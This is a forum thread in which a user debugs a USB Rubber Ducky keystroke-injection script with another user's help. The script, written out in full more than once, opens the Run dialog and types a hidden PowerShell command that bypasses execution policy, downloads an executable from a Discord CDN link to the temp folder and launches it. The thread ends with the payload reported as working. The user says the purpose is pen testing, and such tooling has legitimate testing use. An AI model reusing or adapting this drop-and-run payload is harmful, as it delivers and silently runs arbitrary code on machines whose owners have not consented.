randomblueshark Posted January 9, 2021 Share Posted January 9, 2021 Hello im a newb to usb rubber ducky,I received mine 4 days ago for pen testing, and I have a small problem with the STRING code. Here the code bellow I used. DELAY 200 CONTROL ESCAPE DELAY 300 STRING run DELAY 100 ENTER DELAY 500 STRING powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/777729234181029919/796873244677242910/calc.exe',\"$env:temp\calc.exe\"); Start-Process \"$env:temp\calc.exe\"" ENTER When executed in a notepad.exe ,I get this code with alot of @ and # powershell -NoP -NonI -W Hidden -Exec Bypass @IEX (New-Object System.Net.WebClient).DownloadFile(<https:##cdn.discordapp.com#attachments#777729234181029919#796873244677242910#calc.exe<,@$env:tempbob.exe@); Start-Process @$env:tempbob.exe@@ What im doing wrong? can someone help Link to comment Share on other sites More sharing options...
chrizree Posted January 9, 2021 Share Posted January 9, 2021 It seems as if you need to specify a keyboard language when creating the payload/inject.bin - is the "victim" anything else than US keyb layout? Link to comment Share on other sites More sharing options...
chrizree Posted January 10, 2021 Share Posted January 10, 2021 What method are you using to create the inject.bin file? Link to comment Share on other sites More sharing options...
randomblueshark Posted January 10, 2021 Author Share Posted January 10, 2021 I own corsair k70 keyboard Everything look good using the ca-fr.json on https://shop.hak5.org/pages/ducky-encoder except one thing the usb rubber ducky does not recognize this key ---> " the ducky remplace it for this key --->\ powershell -NoP -NonI -W Hidden -Exec Bypass \IEX (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/777729234181029919/797350378844848148/calc.exe',\\$env:temp\12345.exe\\); Start-Process \\$env:temp\12345.exe\\\ after the execution that the code missing alots of " Ducky must click on Shift and this one surronded in red ,but click on shift + \ the left key beside 1 key Orignal code STRING powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/777729234181029919/797350378844848148/calc.exe',\"$env:temp\12345.exe\"); Start-Process \"$env:temp\12345.exe\"" Link to comment Share on other sites More sharing options...
chrizree Posted January 10, 2021 Share Posted January 10, 2021 So, even if something is still not correct, something has changed between your first an last post; @ has become \, what did you change? Forward slashes / also seems to have been changed to now be correct (was previously the # char in the first post), also < seems to be correct as it's ' in the latest example of your output. Also not sure what keyboard layout you have in the screenshot of your On-Screen Keyboard. I configured one of my Windows 10 boxes for Canadian French and Canadian-French (Legacy) and none of them showed the mapping you have captured in your screen shot. Your physical keyboard doesn't matter, btw. I used the chars that gives you problems with other keyboard layouts and I have no problems running my payloads that contains those chars. Perhaps the ca-fr.json language map file isn't all correct? Link to comment Share on other sites More sharing options...
randomblueshark Posted January 10, 2021 Author Share Posted January 10, 2021 Ok I figured that out why its doing that, my keyboard is us ...now its working ,the code work on my main os system. thanks for help anyway Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.